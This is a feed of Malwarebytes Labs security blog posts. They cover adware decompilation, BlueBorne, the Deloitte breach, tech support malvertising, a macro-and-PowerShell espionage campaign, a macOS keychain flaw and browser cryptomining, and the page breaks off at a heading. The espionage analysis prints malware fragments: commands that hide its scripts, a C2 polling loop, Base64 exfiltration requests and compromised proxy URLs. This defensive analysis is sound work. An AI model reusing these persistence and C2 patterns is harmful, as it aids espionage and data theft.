Techie Feeds

Using ILSpy to analyze a small adware file

Malwarebytes - Thu, 10/05/2017 - 16:19

My curiosity was triggered when the telemetry of our heuristic scanner started showing a multitude of reports about a small file called grandfather.exe, so I went out to grab a copy and have a look at it.

As you can probably tell from some of the detection names at Virustotal, this is a MSIL (Microsoft Intermediate Language) file. There are a lot of tools to decompile MSIL executables, but ILSpy is my personal favorite. To demonstrate why, I will show you how I analyzed this very small executable that is part of the Adware.Dotdo family.

Using ILSpy

Once you have downloaded and unzipped the binaries from their site, you can run ILSpy.exe and click File > Open to navigate to the file that you like to look at.

One advantage of ILSpy is that the code is shown in a very clear format. Even knowing how to read pseudocode and where to find .NET documentation will get you a long way, as I’m about to demonstrate.

The code in the example

Code is shown in C# format

In this code slice, where the most important part of the program is initialized, we see three methods of hiding the program parts from the user:

  • The program will not be shown in the taskbar
  • The opacity is set at 0% which means you will see right through it
  • And the program will not show any error prompts in case any script errors occur

By the way, if you are more comfortable with coding or reading code in, you can set ILSpy to show the code in that format.

Code is shown in VB format
(click to enlarge)

The strings in the code above have been obfuscated in a very simple way. Just enough to throw someone who is merely looking at strings off track.

After applyingReplace("28851129", string.Empty)), which is added to all the strings in that part of the code, this is what’s left of the two functions that will later be used as event handlers:


Private Sub ie(sender As Object, e As EventArgs)

Me.i.AllowNavigation = True


End Sub


The event handler above simply navigates to the obfuscated URL.


Private Sub i(sender As Object, e As WebBrowserDocumentCompletedEventArgs)

If Me.i.Document.Title <> "searchbox"  Then


End If

End Sub


This event handler determines where the browser connects to, based on the title of the current document. If the title of the site does not match “searchbox” then it simply redirects the user to the URL that is obfuscated. If the title already is “searchbox” it will do nothing.

This is where the browser control (‘this’) is initialized while the layout of the main Window (‘base’) is postponed until the browser is ready to go. All the control’s edges are docked to the edges of its containing control and sized appropriately. The browser will resize to fit all of the empty space in its parent container with the DockStyle.Fill property set.

Then the location, size, and name are set, but also the control is hidden by setting the “.visible” property to “false”.

When the new document is fully loaded, the DocumentCompleted event occurs, and the event handler is the (lightly) obfuscated function we discussed earlier, so that will be triggered.

The AutoScaleDimensions property represents the DPI or font setting of the screen that the control was scaled to or designed for. Specifically, at design time this property will be set by the Windows Forms designer to the value your monitor is currently using. The “Font” is auto-scaled as well, relative to the dimensions of the font the classes are using, which is typically the system font.

Then after the browser control has been added to the base application, the first event handler is called which, as mentioned earlier, hides the main window and initializes the browser.


The “program” stays completely hidden from the user, but tries to contact two different websites on the same domain, probably with the intention to fetch further instructions. At the moment of writing, the site contains two iframes connecting to videojelly[.]com and whos.amung[.]us, a visitors counter.

I tried to show why I like ILSpy as a tool to decompile .NET and browse the assembly.

The file we looked at has:

SHA-256              53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240

Grandfather.exe is now detected as Adware.Dotdo.


Pieter Arntz

The post Using ILSpy to analyze a small adware file appeared first on Malwarebytes Labs.

Categories: Techie Feeds

National cybersecurity awareness month: simple steps for online safety

Malwarebytes - Mon, 10/02/2017 - 19:00

With each new devastating breach of security—Equifax, Deloitte, and Sonic, to name a few recent cyber fails—the need for increased cybersecurity awareness has never been more apparent. It’s a good thing, then, that this month is National Cybersecurity Awareness Month (NCSAM).

Observed every October since 2004, NCSAM was created by the Department of Homeland Security and the National Cyber Security Alliance to ensure that every American has the resources they need to stay safer and more secure online. According to the Department of Homeland Security, NCSAM was designed to “engage and educate public and private sector partners through events and initiatives to raise awareness about the importance of cybersecurity, provide them with tools and resources needed to stay safe online, and increase the resiliency of the nation in the event of a cyber incident.”

NCSAM is broken down into weekly themes, including online safety for consumers, securing business networks, looking ahead to the security of future technologies, careers in cybersecurity, and securing infrastructure.

And now Malwarebytes is doing its part. Each week on Labs, we’ll focus on a theme and provide helpful articles, useful tips, and valuable analysis so that you can increase awareness and spread the word. This week’s theme: simple steps to online safety.

Week 1 of NCSAM features the STOP. THINK. CONNECT. campaign, which provides easy, actionable advice for safe surfing. STOP: make sure security measures are in place. THINK: about the consequences of your actions and behaviors online. CONNECT: and enjoy the Internet.

Sounds pretty simple, right? But what exactly does it mean? Here’s our interpretation.

Make sure security measures are in place

It’s often mind-numbing to think about all the things you should and shouldn’t be doing online. Here’s where you use technology to do the heavy lifting. Make sure you’ve got the following equipped on your home computer:

  • Firewall
  • Cybersecurity program that includes technology to block malware, ransomware, adware, and other advanced threats
  • Password manager
  • Wifi secured with password (for mobile devices/streaming)

To learn more about how to proactively protect against various forms of cybercrime, take a look at a few of our articles:

How to beat ransomware: prevent, don’t react

10 easy ways to prevent malware infection

Top 10 ways to secure your mobile phone

Why you don’t need 27 different passwords

With these in place, you can keep out a good chunk of the bad stuff, even if you “misbehave” online. However, human error still accounts for a lot of infections. So that’s why the next step is important.

Think about the consequences of your actions and behaviors online

Sure, you may have layers upon layers of security in place, and that’s going to help. But if you invite a criminal into your home, you’ve pretty much negated any security system you might have deployed. And that’s what happens when you ignore basic online hygiene.

To refresh your memory, there are a few things you need to keep an eye out for/be skeptical of:

  • Tech support scams (Microsoft won’t call you)
  • Phishing emails (is this really your bank asking you to update personal info?)
  • IRS phone calls/texts/emails (they mail you letters)
  • Online shopping on unsecured sites (look for the lock next to the URL)

We could go on, of course, but this general advice is good for all actions online: Does it seem too good to be true? If so, it probably is. Always treat information you encounter with a good sense of skepticism. And for more detailed advice, you can check out these Labs articles:

Tech support scams help and resource page

Something’s phishy: How to detect phishing attempts

Hacking your head: How cybercriminals use social engineering

Connect and enjoy the Internet

If you’re securing your home computer with the proper technologies and making cybersecurity awareness a priority (and if you’ve read this far, that means you are), then you can safely connect to the Internet and enjoy all the cat videos you want to your heart’s content. Sadly, there’s no such thing as being 100 percent secure—online or in life—but you can breathe easier knowing you’re doing the right things and acting responsibly.

Now onward! Go forth, spread the word, and stay tuned for NSCAM’s Week 2 theme: cybersecurity in the workplace is everyone’s business.

Happy surfing!

The post National cybersecurity awareness month: simple steps for online safety appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 25 – October 01)

Malwarebytes - Mon, 10/02/2017 - 16:59

Recently, we talked about the hacking incident at Deloitte, one of the ‘big four’ global accounting firms. It was reported that client email addresses, usernames, and passwords were exposed. This also brought to light weaknesses in their policies and lack of threat intelligence to recover leaked data. We advised Deloitte clients the following: do an inventory of email addresses used to correspond with the company, review network outbound traffic, determine what possible information might have leaked from the hack, and (more importantly) maintain security best practices to avoid repeating hacks like this from happening.

Patrick Wardle, an acclaimed security researcher, found a keychain vulnerability flaw in High Sierra, Apple’s new macOS operating system. This revelation, unfortunately, spurned a lot of articles that one may deem bordering FUD (fear, uncertainty, doubt). So our resident Mac expert, Thomas Reed, set some records straight.

Senior Malware Analyst Nathan Collier likened BlueBorne, the new attack vector using Bluetooth technology, to influenza. First discovered by Armis Labs, BlueBorne can potentially affect billions of devices across multiple platforms. In the piece, Collier stressed the importance of Bluetooth security and agreed with Armis’s prediction that Bluetooth vulnerabilities would continue to be seen in the future.

Lastly, Lead Malware Intelligence Analyst Jérôme Segura discussed some discoveries last week about cryptocoin mining, malvertising, tech support scam, and targeted attacks.

Segura revealed a questionable trend on the rise where website publishers would mine for cryptocurrencies from user machines while on their sites. He also pictured a scenario where mining is also tied with malvertising. Scammers abused Taboola, a global discovery platform, to redirect users from a promoted story to a tech support scam page.

Segura, together with David Sánchez, wrote about an espionage attack against the Saudi Arabia government in an effort let readers understand how the malware entered their target systems and kept in touch with its C&C.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Responsible Vulnerability Disclosure Is Becoming An International Norm. “More and more countries are joining the United States in adopting a policy of weighing the pros and cons of responsible vulnerability disclosure, as the public calls for more clarity regarding intelligence agencies and their supposed hoarding of previously undiscovered software flaws” (Source: Cyberscoop)
  • Mobile Stock Trading App Providers Unresponsive to Glaring Vulnerabilities. “Researchers from IOActive today published a report describing the scope of the security issues. More concerning, however, is the lack of response from the respective financial firms. Of the 21 apps in question, researcher Alejandro Hernandez said he sent detailed private disclosures to 13 brokerage firms and only two had acknowledged the reports as of Monday.” (Source: Threatpost)
  • XPCTRA Malware Steals Banking And Digital Wallet User’s Credentials. “The malspams used in the campaign try to induce the victim to open a supposed bank bill link. It actually leads to the download of the XPCTRA dropper, that is, the part of the malware responsible for environment recognition and downloading new components. Once executed, it initiates a connection with an Internet address to download other malware parts responsible for later malicious actions.” (Source: SANS Internet Storm Center)
  • Android Unlock Patterns Are A Boon For Shoulder Surfing Attackers. “The ‘swiping’ unlock patterns typical for Android devices are considerably easier for attackers to discern than PIN combinations. In fact, after only one observation of a user entering the pattern, 64% of shoulder surfing attackers will be able to reproduce it, a group of researchers from the US Naval Academy and the University of Maryland Baltimore County has found.” (Source: Help Net Security)
  • Police: Buying Fake Goods Online Can Lead to ID Theft. “The City of London Police has shut down 28,000 websites selling counterfeit goods over the past three years, many of which were registered with stolen identities, it has revealed. Over 4000 sites were created using the identities of unsuspecting members of the public, according to the force, which released the figures as part of a new awareness campaign.” (Source: Infosecurity Magazine)
  • No, Facebook Spies Aren’t Secretly ‘Following Me’, It’s A Hoax. “According to the nonsense debunkers over at Snopes, the hoax debuted in January 2017.” (Source: Sophos’s Naked Security Blog)
  • Sudden Rise Detected in Faceliker Malware That Manipulates Facebook ‘Likes’. “The Faceliker malware is not new, being spotted years back, and is a generic detection that describes malware that takes over users’ browsers and uses JavaScript code to perform click-jacking, giving Facebook “likes” to content received from a central command and control server.” (Source: Bleeping Computer)
  • Duo Security Discovers Apple Mac Computers Unprotected from Malicious Firmware Vulnerabilities. “The report shows Mac users who have updated to the latest operating system (OS) or downloaded the most recent security update may not be as secure as they originally thought. A Duo Labs analysis of over 73,000 real-world Mac systems gathered from users across industries found the Extensible Firmware Interface (EFI) in many popular Mac models was not actually receiving the security updates users thought. This left users susceptible to previously disclosed vulnerabilities such as Thunderstrike 2 and the recent WikiLeaks Vault 7 data dumps that detail attacks against firmware.” (Source: Duo Security)
  • Uber London Ban Sees Rise In Malicious Taxi Apps. “Security researchers have warned of a rise in malicious apps masquerading as legitimate taxi-hailing services, as cyber-criminals look to capitalize on Transport for London (TfL)’s recent decision to ban Uber.” (Source: Infosecurity Magazine)
Latest updates for Businesses
  • Criminal Hacking: Top Technology Risk To Health, Safety And Prosperity. “Americans believe criminal hacking into computer systems is now a top risk to their health, safety and prosperity. Criminal hacking, a new ESET survey finds, outranks other significant hazards, including climate change, nuclear power, hazardous waste, and government surveillance.” (Source: Help Net Security)
  • Three Out Of Four DDoS Attacks Target Multiple Vectors. “Three out of every four DDoS attacks employed blended, multi-vector approaches in the second quarter of 2017, according to Nexusguard. The quarterly report, which measured more than 8,300 attacks, demonstrated that hackers continued to rely on volumetric attacks to overwhelm system resources.” (Source: Help Net Security)
  • Why Your Business Must Care About Privacy. “The current conversation often pits privacy against security, both in consumer and enterprise settings. This is especially true in the debate over whether mobile encryption is essential for the average user. However, not wanting to have personal information shared, acted on, or used by anyone without permission should be seen as a universal right.” (Source: Dark Reading)
  • Shocker? Companies Still Unprepared To Deal With Ransomware. “Companies and government agencies are overwhelmed by frequent, severe ransomware attacks, which have now become the #1 cyber threat to organizations, according to Crowd Research Partners.” (Source: Help Net Security)
  • Healthcare Sector Reports Greatest Number Of Security Incidents. “McAfee Labs saw healthcare surpass public sector to report the greatest number of security incidents in Q2, while the Faceliker Trojan helped drive quarter’s 67% increase in new malware samples from the social media landscape.” (Source: Help Net Security)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (September 25 – October 01) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

BlueBorne – Bluetooth’s airborne influenza

Malwarebytes - Fri, 09/29/2017 - 15:00

Armis Labs has discovered a new attack vector that targets any device that has Bluetooth capability. This includes mobile, desktop, and IoT — roughly accounting for 8.2 billion devices. All operating systems are susceptible — Android, iOS, Windows, and Linux. Dubbed BlueBorne, it exposes several vulnerabilities in the Bluetooth technology. These vulnerabilities open up the potential to perform an array of malicious attacks. Some of which, stated by Armis, are as follows:

  • Take control of devices
  • Access corporate data and networks
  • Break into secure networks that use air gap security measures
  • Spreading malware thatise in range of device with infection

BlueBorne does not require Bluetooth devices to be paired to other devices to be exploited. Even worse, devices are susceptible even when Bluetooth is in non-discoverable mode.

The ease of exploitation

What exactly does it take to exploit these new-found Bluetooth vulnerabilities? As noted in the Armis Labs BlueBorne whitepaper, the first step to is to steal the BD_ADDR (Bluetooth Device address). This is a hardcoded 48 bit MAC address of the Bluetooth device. Stealing the BD_ADDR the Bluetooth device, especially when it is set to non-discoverable, used to be considered a feat.  With the introduction of new Bluetooth “sniffing” hardware, this has become a lot easier. One such device is the open source hardware Ubertooth which plugs into a USB port of a computer.  Simply be within range with the Ubertooth plugged in, and it will grab any Bluetooth traffic from the air. With the help of some other monitoring tools to analyze the traffic — voilà — you have BD_ADDRs.

Spreading malware via Bluetooth

One of the more intriguing attacks is the potential to propagate malware using BlueBorne vulnerabilities. More specifically, through mobile devices.

The only way I could hypothesize this happening is through an attack using a list of collected BD_ADDRs and then creating a malicious app which scans for those addresses. Any device within range on the list becomes a target. Using the BlueBorne vulnerabilities to propagate itself, the malicious app transfers to the target device. Keep in mind the user of the target device would need to accept installing the malicious app as well.

All this isn’t impossible, but unlikely with the limitation of requiring a list of BD_ADDRs. Now if a mobile device could steal BD_ADDRs for itself — which it can’t at this point — then we should start worrying.

So how bad is it?

The work done by Armis Labs to present the BlueBorne vulnerabilities is extremely valuable to the security industry. It highlights the need for improved Bluetooth security. I applaud them for their hard work in this endeavor.

The introduction of sniffing hardware like Ubertooth and the creation of other open-source tools to analyze the collected traffic like Kismet have taken down the toughest barrier for hackers — collecting the BD_ADDR. With this exposure, I agree with Armis Labs predication — we will continue to see more Bluetooth vulnerabilities arise.

The requirement of having to be within Bluetooth range creates a limitation to BlueBorne. I believe this limitation will isolate it to more targeted attacks — most likely against specific companies.  In this case scenario, a spear phishing attack would be much easier to carry out and wouldn’t require being physically within Bluetooth range. Therefore, I’m skeptical that we will see BlueBorne implemented in a real-world attack.

Disabling Bluetooth

Bluetooth, by default, is enabled. If you don’t use Bluetooth i.e. you don’t have any devices paired, it’s best to disable it. If you do use your Bluetooth, disabling it when not in use is the most secure option against BlueBorne. However, many use their mobile devices to pair with their vehicle’s handsfree unit. Ideally, remembering to enable/disable Bluetooth depending on whether you’re driving or not is the best option. Not as ideal and more likely, you will forget to enable Bluetooth before starting to drive — myself included. Therefore, you have to weigh what is more of a threat. A BlueBorne attack or looking at your phone to enable Bluetooth WHILE driving? Just something to think about.

The post BlueBorne – Bluetooth’s airborne influenza appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Deloitte breached by hackers for months

Malwarebytes - Thu, 09/28/2017 - 16:00

On September 25, 2017, Deloitte announced that they detected a breach of the firm’s global email server via a poorly secured admin email in March of this year. Further, the attackers most likely had control of the server since November of 2016. Deloitte’s initial statement indicated that only six of their consultancy clients were impacted by the breach, but insider sources later disclosed to the media that the attack most likely compromised every admin account at the firm. The startling severity of the breach has brought attention to Deloitte’s other cybersecurity practices, which, as we can see here with a likely Active Directory server, are not ideal. (There are valid applications for self-signed certificates, but the larger problem here is that the server is exposed to the outside internet at all, running unnecessary services.)

An admin account subversion is not very shocking, given that a significant number of Deloitte email accounts can be found on paste sites, most of a low complexity suggesting the firm has minimal password policies, and lack of a threat intelligence capacity to identify and recover leaked PII. A quick scan of showed a significant amount of Deloitte data from various locations, going back five years. A portion of those pastes were email credentials – the primary breach vector – as shown below.

What you should do if you’re a Deloitte cybersecurity client
  • First and foremost, take a quick inventory of your own corporate email accounts that have corresponded with the company. Accounts with normal network privileges could benefit from a password reset. Those with elevated privileges should be reviewed for accesses and unusual activity. It’s not unheard of for attackers to breach an ancillary services firm in furtherance of an attack on the main target.
  • Do Deloitte consultants have accounts on your network? You can review outbound traffic on these hosts to make sure it matches with their work role.
  • Maintain your own threat intelligence capacity to identify work product that might be leaked on paste sites. Enormous breaches like this one are quickly monetized on the dark web, with data eventually filtering out for public use. You can’t prevent third party access to your data, but you can find it in a timely manner, and serve a takedown request accordingly.
  • Don’t repeat their mistakes. Best practices for enterprise security are widely written about and publically available. While security is generally seen as a cost center, it would be more accurate to describe it as an investment in public trust. And without trust, how profitable could your enterprise possibly be?

Third-party breaches are occurring at an accelerating rate. While outsourcing data security to a popular vendor checks off the “security box,” there is no good substitution for in-house expertise that knows the business as well as security. Good security now is an investment in stable capital growth later. Building in-house talent to facilitate that growth can put you ahead of the curve before the next breach happens.

The post Deloitte breached by hackers for months appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Tech support scammers abuse native ad and content provider Taboola to serve malvertising

Malwarebytes - Thu, 09/28/2017 - 14:58

A large number of publishers – big and small – are monetizing their sites by selling space for companies that provide so-called native advertising, cited as more effective and engaging than traditional banner ads.

Indeed, on a news or entertainment site, users are more inclined to click on links and articles thinking that they are one and the same, not realizing that those are actually ‘sponsored’ and tied to various third-party providers.

Rogue advertisers have realized this unique opportunity to redirect genuine traffic towards their own infrastructure where they can subject their audience to whatever content they wish.

Case in point, we caught this malvertising incident on, the Microsoft web portal that attracts millions of unique visitors. While clicking on a story promoted by Taboola – a leading global discovery platform which Microsoft signed a deal within 2016 – we were redirected to a tech support scam page. The warning claims that our computer has crashed and that we must call a number for immediate assistance.

Figure 1: Automatic redirection from click on promoted story to scam page

The fraudulent page cannot be closed normally because it uses code that repeats the warning indefinitely. Unfortunately, this is enough to scare many folks and trick them into calling what they think is Microsoft support. Instead, they will be dealing with fake technicians whose goal is to extort hundreds of dollars from them.

Decoy news page hides real intentions

Rogue actors typically start creating content just like any other advertiser would and build up a profile. After all, they want to appear genuine in order to game the system with ‘hot’ content.

What’s determined as hot can be derived from real or shocking news. The point is to do a little bit of market study on what the most searched for stories or keywords are in order to attract traffic.

In this malvertising example, if we review the sequence of events, we realize that the scammer created a bogus news site (infinitymedia[.]online) which does have actual content but is performing conditional redirects, also known as ‘cloaking’.

Figure 2: Traffic view showing temporary hop via decoy news site

A conditional redirect is usually a server-side mechanism that profiles the user and returns a particular response. For instance, if the server determines that a bot or crawler is making a request, it may in turn either deny it or simply serve the expected content (decoy). Similarly, if the user is running Internet Explorer, is from North America and their IP address appears to have hit the server for the first time, they may receive a scammy page instead.

The point is that it’s trivial to play a Dr. Jekyll and Mr. Hyde kind of game and serve the content you want. The fraudulent advertiser did create various pages with impactful keywords (potentially for Search Engine Optimization purposes) and can also use those stories as a decoy:

Figure 3: Stories designed for click-bait

To get back to this malvertising incident on MSN, the user was conditionally redirected to another site (the tech support scam page), and never saw the content they were looking for.

Figure 4: The 302 redirect call from the fake news site to the scam page

To show that this was no mere ‘coincidence’, we can look at the ownership of the ‘news’ site (infinitymedia[.]online) and see how it links to the tech support domain name (4vxadfcjdgbcmn[.]ga). A WHOIS lookup for infinitymedia[.]online returns the following information:

Domain Name: INFINITYMEDIA.ONLINE Creation Date: 2017-05-23T05:14:50.0Z Registrar: PDR Ltd. d/b/a Registrant Name: bhanu Registrant Country: IN Registrant Email:

A cursory review using RiskIQ’s PassiveTotal of recently created domains using the same email address shows a tendency for this actor to register tech support scams domains:

Figure 5: Domains recently registered by the actor behind the decoys news sites

Still, we don’t have a clear connection to 4vxadfcjdgbcmn[.]ga which does not have an identifiable registrant. Indeed, the .GA Top Level Domain (TLD) is comprised of free domain names and their registrant is… Gabon TLD B.V.

However, this particular actor made the mistake of reusing the same host server for domains he had created before. For example, if we take micro-soft-system-alert2[.]online which is registered to his email address, we notice that it resolves to, a server full of tech support scams and phishing sites, including the one used in this particular malvertising attack, namely 4vxadfcjdgbcmn[.]ga.

Figure 7: Connecting the fake news sites to the tech support domain

Further inspection of other properties tied to shows similar bogus ‘news’ sites:

hollywoodreporter[].online latestnynews[.]online theonlytimesnews[.]xyz uk-times-news[.]xyz unitedtimesnews[.]xyz 247breakingnews[.]xyz 247-breakingnews[.]xyz thenewyorktimenews[.]xyz

There is no doubt that this actor has very clear intentions and has turned high-profile stories into a click-bait lead generation tool for tech support scams.

Banner ads versus native advertising

Banner ads can load third-party tags that are laced with malicious content, not to mention promoting anything that is outrageous (regardless of whether it has anything to do with the current content) and is bound to get clicks. For instance, there have been many documented instances of fake celebrity deaths used for click bait purposes on Facebook.

But promoted stories aren’t necessarily that different (or safer) when they take the user to a third-party website that is in the complete control of an advertiser, good or bad.

Users should be aware that even on a trusted platform, they should watch what they click on and be careful of sensationalist stories that may be used as click bait.

We reported the fraudulent advertiser to Taboola which told us they had opened an internal review of this particular vendor. We reached back with more questions regarding how Taboola deals with click bait and fake news, whether they scan articles for malware or scams, and finally if they had a direct point of contact to report security-related issues. However, we only received a response for the fake news problem, which you can read more about here.

The post Tech support scammers abuse native ad and content provider Taboola to serve malvertising appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

Malwarebytes - Wed, 09/27/2017 - 01:06

This post was co-authored by David Sánchez and Jérôme Segura

We recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.

In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.

This new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.

The malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell. In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.

Covert delivery and persistence

The decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content” stating that the document is in protected view (which is actually true).

A high-level summary static analysis of this document reveals that it includes a macro as well as several Base64 encoded strings.

OLE:MAS--B-- target.doc (Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)

One of the first routines the malicious VBScript performs is to disable or lower security settings within Microsoft Excel and Word by altering corresponding registry keys with values of “1”, meaning: Enable All (ref).

The VBScript also fingerprints the victim for their IP address by querying the Win32_NetworkAdapterConfiguration class:

It then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:

The data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.

This VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:

attrib +s +h "C:\Users\public\documents\NTSTATS.ps1" attrib +s +h "C:\Users\public\documents\NTSTATS.vbs" Espionage and exfiltration

That PowerShell script also has the same instructions to lower Office’s security settings but more importantly is used to exfiltrate data and communicate with the command and control server.

A unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).

GET http://144.76.109[.]88/al/?action=getCommand&id=[user ID] HTTP/1.1

A function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).

Another function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:

while ($true){  getCommand $key  start-sleep -Seconds 300 }

The malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.

The eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function:

The transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the exfiltrated data.

GET /wp-content/wp_fast_cache/[removed]== HTTP/1.1 Host: Connection: Keep-Alive

The parameters passed on the URL in the Base64 format:


Decoding the value in the variable “res”, we get the following info.

Connection-specific DNS Suffix . : [removed] Description . . . . . . . . . . . : [removed] Physical Address. . . . . . . . . : [removed] DHCP Enabled. . . . . . . . . . . : [removed] Autoconfiguration Enabled . . . . : [removed] Script based attack and protection

This attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2) which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.

Relying on scripts as part of the attack chain and ongoing infection is an interesting concept due to how modular it is, not to mention more likely to stay undetected from antivirus engines. At the same time, it needs to rely on various encoding techniques because it can’t make use of a packer like a traditional malware binary would. 

Malwarebytes users are already protected against this attack thanks to our signature-less engine.

Indicators of compromise


C:\Users\public\documents\NTSTATS.ps1 C:\Users\public\documents\NTSTATS.vbs




larsson-elevator[.]com/plugins/xmap/com_k2/com.php?c= spearhead-training[.]com/action/point2.php?c= itcdubai[.]net/action/contact_gtc.php?c= taxconsultantsdubai[.]ae/wp-content/themes/config.php?c=[.]uk/Senditem.php?c= wmg-global[.]com/wp-content/wp_fast_cache/ romix-group[.]com/modules/mod_wrapper/Senditem.php?c= heartmade[.]ae/plugins/content/contact/Senditem.php?c= arch-tech[.]net/components/com_layer_slider/Senditem.php?c=

The post Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Keychain vulnerability in macOS

Malwarebytes - Tue, 09/26/2017 - 18:11

On Monday, Patrick Wardle, a respected security researcher at Synack and owner of Objective-See, sent a tweet about a keychain vulnerability he had found in macOS High Sierra. As his tweet showed, it is possible for a malicious app to extract, and then exfiltrate, keychain data from High Sierra, with passwords clearly exposed in plain text.

In response to some questions, Wardle has also posted some additional information in an FAQ on Patreon.

This announcement set off a firestorm of articles on a variety of sites, which unfortunately caused a lot of FUD (fear, uncertainty, and doubt). In at least one case, I saw an article saying to hold off on installing High Sierra until this bug is fixed. It seems that many of these articles were written based solely on the contents of that tweet, but there is much more to be said.

It’s important to understand that the idea that people should wait to install High Sierra because of this bug is a very bad one, for multiple reasons.

First, as Wardle points out in his FAQ, this bug also affects Sierra and probably affects El Capitan as well. For all we know, it may go back further than that… only testing older systems can say for sure. So, you’ve probably got the vulnerability already anyway, whether you upgrade to High Sierra or not.

Second, installing updates and upgrades is an extremely important thing to do to keep yourself secure. If you don’t update, you don’t get important security fixes. If you skip upgrading to High Sierra because of one vulnerability (which you’re already vulnerable to anyway), that may mean that you will continue to be vulnerable to other issues that may have been fixed in High Sierra, but not in Sierra.

Keep in mind that the Mac fix for the extremely serious Broadpwn vulnerability was, apparently, only applied to macOS Sierra 10.12.6. So the old common knowledge that Mac security fixes go into the last three systems (El Capitan, Sierra, and High Sierra) does not seem to still be true, if it ever really was.

Third, let’s pretend for a moment that this was a vulnerability only affecting High Sierra. If you skip High Sierra, that implies that you think doing so makes you safe from keychain theft. Think again.

Consider, for example, the issue described in a blog post by Brenton Henry, in which a combination of an Apple tool and an AppleScript could be used to extract the contents of the keychain. That issue exists on older systems, but not Sierra or High Sierra.

Not only is the issue described by Henry a vulnerability that still exists on older systems, it’s a known vulnerability. That means that any script kiddie capable of doing a Google search would be able to implement it; it’s not that hard to do. Nobody knows yet how the vulnerability found by Wardle works, only that it exists.

As another example, think about the compromise of the HandBrake app in May, which led to systems being infected with the Proton malware. In that case, Proton was able to successfully trick the user into providing their password, and then exfiltrated that and their keychain files (among other things), which could be unlocked using that same password in most cases.

There was also the case of an interesting sample of the Dok malware one of our researchers received in a junk e-mail, which used an open-source Python remote access tool (RAT) that had the capability to exfiltrate the keychain and convincingly phish a user’s password.

These last two examples would work on any system, including High Sierra since they involve theft of both the user’s password and the keychain files.

Don’t get me wrong, this is a very bad vulnerability, and Apple should fix it as soon as possible. However, it’s not a world-ending catastrophe, nor is it a good reason to avoid installing High Sierra. There will always be vulnerabilities. Keeping your system and your software up-to-date is one of the best ways you can cope with them.

The post Keychain vulnerability in macOS appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Drive-by mining and ads: The Wild Wild West

Malwarebytes - Mon, 09/25/2017 - 17:16

There seems to be a trend lately for publishers to monetize their traffic by having their visitors mine for cryptocurrencies while on their site. The idea is that you are accessing content for free and in exchange, your computer (its CPU in particular) will be used for mining purposes.

The Pirate Bay started to run a miner on its site and later publicly acknowledged it. In other cases, the mining was a byproduct of malicious adverts or done via legitimate but compromised websites that are being injected with cryptomining code directly.

Needless to say, this practice is raising many eyebrows and not everyone is on the same page about whether this new business model could be a long-term replacement for ads (although most people agree that ads are often annoying and malicious).

But what exactly happens when publishers turn your PC into a miner and display ads at the same time? In this post, we take a look at what is arguably a bad mix.

Drive-by mining

Because mining happens in the browser via JavaScript without user interaction, we could compare it to drive-by downloads. As publishers need to retain the visitor’s attention so that the JavaScript code runs uninterrupted for as long as possible, this is where the type of content matters. We know that for example gaming or video streaming sites tend to keep people on their page much longer than others.

Figure 1: A streaming site that is (not so) silently mining cryptocurrency

There is one exception here, in that in some cases, loading the JavaScript mining code once is enough, no matter whether the user decides to change site afterward, the mining will continue. This particular abuse technique affects Internet Explorer (i.e. the zombie script) and was identified and reported (but not fixed yet) by Manuel Caballero.

This concept of mining digital currency via the browser is a little odd at first because it is well known how resource intensive mining can be, requiring powerful machines loaded with expensive hardware. While this is true for Bitcoin, it is not for other currencies that were designed for ordinary CPUs.

Take the Monero digital currency, powered by the CryptoNight algorithm, which can be mined with a standard CPU with little difference in overall results compared to running more advanced hardware. This literally opens the door to a large and still mostly untapped market comprised of millions of typical consumer machines.

Coinhive advertises itself as “A Crypto Miner for your Website” and enables website owners to quickly set up mining by using their JavaScript API. Without a doubt, it has gained very rapid adoption but unfortunately is already being abused.

Figure 2: JavaScript API/code from Coinhive on the client side used to mine cryptocurrency

Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without having a noted impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience.

The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.

Forced mining and malvertising

